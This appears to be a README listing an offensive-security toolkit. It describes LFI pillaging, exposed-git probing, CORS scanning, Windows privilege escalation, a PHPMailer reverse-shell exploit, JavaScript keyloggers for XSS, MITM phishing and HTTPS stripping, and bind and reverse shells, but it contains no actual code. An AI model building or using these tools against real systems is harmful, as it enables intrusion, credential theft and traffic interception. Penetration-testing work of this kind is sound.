LA FOIR'FOUILLE
Tools and more... List below is not maintained.
FINGERPRINT
-
haveibeenpwned.sh - Takes input emails and checking their pwned status on https://haveibeenpwned.com/.
-
web/pillage.sh
Finding interesting files on a system thanks to a LFI previously found on the target. -
web/versionchecker.sh
versionchecker.sh will hash some input files and compare them to hashes computed from the specific GIT releases. It helps to identify for example a CMS version if some CHANGELOG.txt files are missing.
Example of command:
./versionchecker.sh -s ./input -g ~/Documents/repo/drupal/ -p "^[78]\.[0-9.]+$"
-
web/knocktone/knocktone.py
- convert knockpy json output file for aquatone-scan
- DNS resolve and look for unresolved aliases
- generate subdomains list
- scan headers generated by aquatone-scan
- and much more...
- pip install -r requirements.txt
-
web/cors/cors.py
- Multi-threaded script looking for some permissive CORS, taking a list of urls or domains in input
Example of command:
cors.py -f urls.txt
Update 03/07/2020: Everything has been merged into https://github.com/chenjj/CORScanner.git
- Multi-threaded script looking for some permissive CORS, taking a list of urls or domains in input
-
- Small bash script providing the following information about a web exposed git repository (even if no traversal dir):
- Dates of last commits on each branch
- Highlights directory traversal
- Highlights if remote url can be accessed (may provide juicy info like user:[email protected])
- Displays .git/config file and root .gitignore
Example of command:
git.sh -u http://monsite.com/.git/
- Small bash script providing the following information about a web exposed git repository (even if no traversal dir):
PRIVILEGE ESCALATION
- windows/privesc.bat - Dirty script for windows using accesschk.exe (needed to be uploaded in the same time, check sysinternals).
- windows/wmic_info.bat - Same using the WMI command-line utility.
- windows/win_user_add.c - Add a user to local group Administrators.
EXPLOITS
- egg_hunter.c - A 18 bytes Egg-Hunter shellcode (https://www.exploit-db.com/exploits/41909/)
- rce_phpmailer_exim.py - Reverse shell linux exploit for PHPMailer < 5.2.20, SwiftMailer <= 5.4.5-DEV, zend-mail < 2.4.11 with Exim MTA
- js_keylogger/keylogger.js - Keylogger in javascript useful when XSS found or browser cache poisoning while MITM
- js_keylogger/formscapture.js - Set a callback function on all forms submit event
NETWORK
- mitm/phishing.sh - Launches an MITM attack and redirecting a specific domain to our phising web page.
- mitm.sh (with Mitmproxy) - has it's own repo
A custom proxy that aims at stripping all HTTPS web page links and keeping unsecure connection with the proxy: VICTIM <-- HTTP --> MITMPROXY <-- HTTPS --> WEBSITE.
It works for any websites with at least one insecure page (which reliably means HSTS is not used for the current domain).
You can control and do whatever you want with the trafic thanks to custom Python scripts.
DEV
- urls/uniqurls.py - keep only unique urls (for each FQDNs, keeping the unique combinations of GET parameters)
- bruteforce/java/
- bruteforce/javascript/ - Bruteforce algorithms with permutations and fixed position characters.
- shell/lin_shell_bind_tcp.c - /bin/sh TCP bind shell.
- shell/lin_reverse_tcp_shell.c - /bin/sh TCP reverse shell.
- shell/uid_gid_root_shell.c - setreuid/setregid root /bin/sh shell.
...